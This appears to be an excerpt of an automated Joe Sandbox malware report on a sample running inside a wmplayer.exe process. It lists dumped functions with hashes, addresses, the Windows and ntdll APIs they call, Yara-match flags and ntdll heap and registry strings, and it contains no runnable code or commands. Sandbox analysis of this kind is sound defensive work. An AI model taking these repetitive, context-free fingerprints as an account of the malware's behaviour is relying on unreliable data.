Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
Instruction ID: 7152e8f79309b5124c13b769bd57648f4b61710c2819786d3777204fada2906f
Opcode Fuzzy Hash: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
Instruction Fuzzy Hash: 0C90023120140817D111B2984544747000A87D0341FE5C452A142855CD97568A56A122

Function 03872D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872D1A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
Instruction ID: 5b39f8da44cc78659186dc51bff5a1cef7ef990bff7038e8476aaa2073fe378a
Opcode Fuzzy Hash: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
Instruction Fuzzy Hash: 5E90022921340406D180B298544864A000687D1302FE5D455A101955CCCA15896D5322

Function 03872D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872D3A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
Instruction ID: be3e35b29f021ff316d4fa2fbd53553878e98f524441bca3279f131d092092b3
Opcode Fuzzy Hash: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
Instruction Fuzzy Hash: B090022130140407D140B29854586464006D7E1301FA5D051E1418558CDA15895A5223

Function 03872CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872CAA

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
Instruction ID: 7f95b53d0430a81cbac8962aed0cccc017eb08aaad18d6c03b4be93260020524
Opcode Fuzzy Hash: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
Instruction Fuzzy Hash: EC90023120140806D100B6D85448686000687E0301FA5D051A6028559EC76589956132

Function 03872C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872C7A

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
Instruction ID: 725ff3065874a0cb7581fd670df5d6917cfadb3ec04f454cd1351a7b2b59b057
Opcode Fuzzy Hash: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
Instruction Fuzzy Hash: C390023120148C06D110B298844478A000687D0301FA9C451A542865CD879589957122

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
Instruction ID: d58fe8e4865b7a2b9ec26276515fb776abeb1cc765f7a728b76389d142a7d987
Opcode Fuzzy Hash: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
Instruction Fuzzy Hash: 03213AB2D4020857CB25DA64AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D

Strings

6EA, xrefs: 0041A622, 0041A62C

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

Function 0041A672 Relevance: 3.0, APIs: 2, Instructions: 42
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 4724de83f279594ad4d88937b01ba56aa79782106da425acb9c3b8f61ff1dfc5
Instruction ID: 3b561ed820cf4f22d487782b8bbc06652ed4f15ec1ac5af2381640b30d6f14ad
Opcode Fuzzy Hash: 4724de83f279594ad4d88937b01ba56aa79782106da425acb9c3b8f61ff1dfc5
Instruction Fuzzy Hash: 57F0AFB02112047FC721EF69CC81EDB3B69DF85754F10815AFC4897242C231D911CAE1

Function 0040830B Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 65f9a2811ef9d1d5c9a1b268f4800a4e3dbd7ff1467ff529169926873c16c9e3
Instruction ID: 4edaf1d8238e945c623d9befb7d6078b409c85ea64aa95a625cca38b3500d8d3
Opcode Fuzzy Hash: 65f9a2811ef9d1d5c9a1b268f4800a4e3dbd7ff1467ff529169926873c16c9e3
Instruction Fuzzy Hash: 2E01B531A8032877E720A6959C43FEE776C5B44F54F05011AFF04BA1C1E6A8690546EA

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
Opcode Fuzzy Hash: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA

Function 0041A791 Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e27772e3287ab67bfa5b8d9fc4f2c8ec6fc4a70a0c885e02ef389afb1bf96d86
Instruction ID: c7bb0476fe581877dad0db914ec54adeb95ff91b4db81a5ec4398ae27d82247d
Opcode Fuzzy Hash: e27772e3287ab67bfa5b8d9fc4f2c8ec6fc4a70a0c885e02ef389afb1bf96d86
Instruction Fuzzy Hash: 2FF0AFB5200204AFDB24DF68CC81EE777A9EF88314F11856AFD9C97241D635E861CBB1

Function 0041A7D6 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: de6026ab64bc3f0a855ba533ffe51ca228245a8baf93753d814affe18a0e800b
Instruction ID: c215c0639032c4aa668ba42cf2a19f07f963aad7dd3b101d89bd6c430a74d262
Opcode Fuzzy Hash: de6026ab64bc3f0a855ba533ffe51ca228245a8baf93753d814affe18a0e800b
Instruction Fuzzy Hash: 2FF027752012446FDB11DF18CC40FE77BA5EF45310F10405AF98C97241C935D461C7B5

Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0

Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5

Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8

Memory Dump Source

Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1

Function 03872C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872C24

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
Instruction ID: cb0054b3d92d88ebb062ce99be82bf843719ec901fd717cdd5a117496de06d25
Opcode Fuzzy Hash: 45287dbc22a10da2507a01c76850d9daf97477662aa3273d635014b6db924b69
Instruction Fuzzy Hash: 57B09B719015C5C9DA11F7A04608717790567D0701F69C4E1D3034645E4739C1D5E176

Non-executed Functions

Function 038B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 038B2F3F, 038B3059
UnloadEventTraceDepth, xrefs: 038B24C0
DisableHeapLookaside, xrefs: 038B246D
GlobalFlag2, xrefs: 038B2FC0
MaxDeadActivationContexts, xrefs: 038B2D82
MinimumStackCommitInBytes, xrefs: 038B2BB0
DisableExceptionChainValidation, xrefs: 038B275F
LdrpInitializeExecutionOptions, xrefs: 038B317D
UseImpersonatedDeviceMap, xrefs: 038B251C
ShutdownFlags, xrefs: 038B24A1
CFGOptions, xrefs: 038B2967
@, xrefs: 038B2942
ExecuteOptions, xrefs: 038B25A0
MaxLoaderThreads, xrefs: 038B24EC
@, xrefs: 038B2B74
Initializing the application verifier package failed with status 0x%08lx, xrefs: 038B3176
FrontEndHeapDebugOptions, xrefs: 038B2489
minkernel\ntdll\ldrinit.c, xrefs: 038B3187
TracingFlags, xrefs: 038B2549
RaiseExceptionOnPossibleDeadlock, xrefs: 038B2579

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
Instruction ID: c9fb79fe6cac786a2b8e5783199a299aff21857ba4ab7521bd2c30f6bc4a6dce
Opcode Fuzzy Hash: d180ebb643bebe04622c3f9d976e3d5dd8a0b4cfc664d30308ea4b2a56b59414
Instruction Fuzzy Hash: AF928B75608746ABD720DEA4C880BABB7F8BB84754F084D9DFA94DB350D770E844CB92

Function 038E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 038E16CD, 038E16F9, 038E1749, 038E179B, 038E17FC, 038E1840, 038E18D9
HEAP: , xrefs: 038E1706, 038E1756, 038E17A8, 038E1809, 038E184D, 038E1895, 038E18E6
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 038E18A5
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 038E186B
Heap block at %p has incorrect segment offset (%x), xrefs: 038E181A
Heap block at %p is not last block in segment (%p), xrefs: 038E17B7
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 038E176D
Free Heap block %p modified at %p after it was freed, xrefs: 038E171B
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 038E18F8

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
Instruction ID: 9b605f4a8fa7d8b59a2eeaedf8a4f1308038c465da60f3647eb44ea7fa3d5e22
Opcode Fuzzy Hash: 55e912153af230f52bf92d2693c1106344e0f727ce4e86a99135a9ca4a8bc292
Instruction Fuzzy Hash: A012BC74604655EFC725CFA8C449BBABBE5FF0A704F1884D9E496CB681E738E881CB50

Function 0382D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0382D49D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0382D3B6
PreferredUILanguages, xrefs: 0382D4B8, 0382D4C5
Control Panel\Desktop\MuiCached, xrefs: 0382D62B
@, xrefs: 0382D3E9
Control Panel\Desktop, xrefs: 0382D45D
@, xrefs: 0382D663
MachinePreferredUILanguages, xrefs: 0382D685
PreferredUILanguagesPending, xrefs: 0388A8DE

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
Instruction ID: 599b139e1f6914bea06726ce2afabe72f6164afde32a367a0bf8934d952f2ba3
Opcode Fuzzy Hash: 1af99b6ba4e4d7a1a36ae7ff7518ab936584d6f8338201cea88cc394d9314913
Instruction Fuzzy Hash: 91B1CE715083659FC711DFA8C880A6BBFE8BF84704F0549AEF8A9D7240D774D989CB92

Function 038C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

Global\Session\%ld%s, xrefs: 038C94C5
%s\%u-%u-%u-%u, xrefs: 038C9422
%s\%ld\%s, xrefs: 038C948D
\Sessions, xrefs: 038C9488
BaseNamedObjects, xrefs: 038C9477, 038C947C
\AppContainerNamedObjects, xrefs: 038C94AB, 038C94B9
AppContainerNamedObjects, xrefs: 038C946E, 038C94D6
\BaseNamedObjects, xrefs: 038C949E

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
Instruction ID: aac8c23a1b95a431bc2d1788e6f9834bff80ac7dae3e261a99a7adc821c4cc95
Opcode Fuzzy Hash: c9f1564c925f9fce90b5bf7082112715277ddbdd8c0cca94a4ae39ca245b1824
Instruction Fuzzy Hash: F0D1C072814395AFD721DAE8C840FABB7ECAF84714F0449EDFA94DB250E774C9448B92

Function 038E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 038E0399, 038E04A8, 038E05D0, 038E0675, 038E06CC
Just reallocated block at %p to %Ix bytes, xrefs: 038E05F1
HEAP: , xrefs: 038E03A6, 038E04B5, 038E05DD, 038E0682, 038E06D9
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 038E069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 038E04D3
About to reallocate block at %p to %Ix bytes, xrefs: 038E03BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 038E06EA
RtlReAllocateHeap, xrefs: 038E02BF, 038E0362

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
Instruction ID: f3972ab6122a555f2feedc17d37bdf20521cacc1b90ce15658914ca8e45b6795
Opcode Fuzzy Hash: 10020bd03cbb14eda7a54ba2dae5cec391beae3da0655dea59acfb178b6494c4
Instruction Fuzzy Hash: 47D1CCB5504785EFCB22DFEAC440AADBBF1FF4A604F088889E455EB252D7B49981CB11

Function 0382D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 0382D313
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0382D146
@, xrefs: 0382D2AF
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0382D0CF
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0382D2C3
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0382D262
Control Panel\Desktop\LanguageConfiguration, xrefs: 0382D196
@, xrefs: 0382D0FD

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
Instruction ID: 4d98739f4f027daedb79b0a89a7f65b70ba117ff6fdb191219e4ee39d379a7fe
Opcode Fuzzy Hash: 2aed5addc68bd37fd294646e8087038a9a4dbca997706114ccd789d24a7bb2bb
Instruction Fuzzy Hash: 5FA18A719083559FD321DFA4C484B5BFBE8BB84715F004DAEE5A8D6280E778D948CB93

Function 0382F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 0388E3A9
(LONG)FreeEntry->Size > 1, xrefs: 0388E291
HEAP[%wZ]: , xrefs: 0388DF57, 0388E09B, 0388E279, 0388E391
(UCRBlock != NULL), xrefs: 0388DF6F
HEAP: , xrefs: 0388DF64, 0388E0A8, 0388E286, 0388E39E
((LONG)FreeEntry->Size > 1), xrefs: 0388E0B3

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
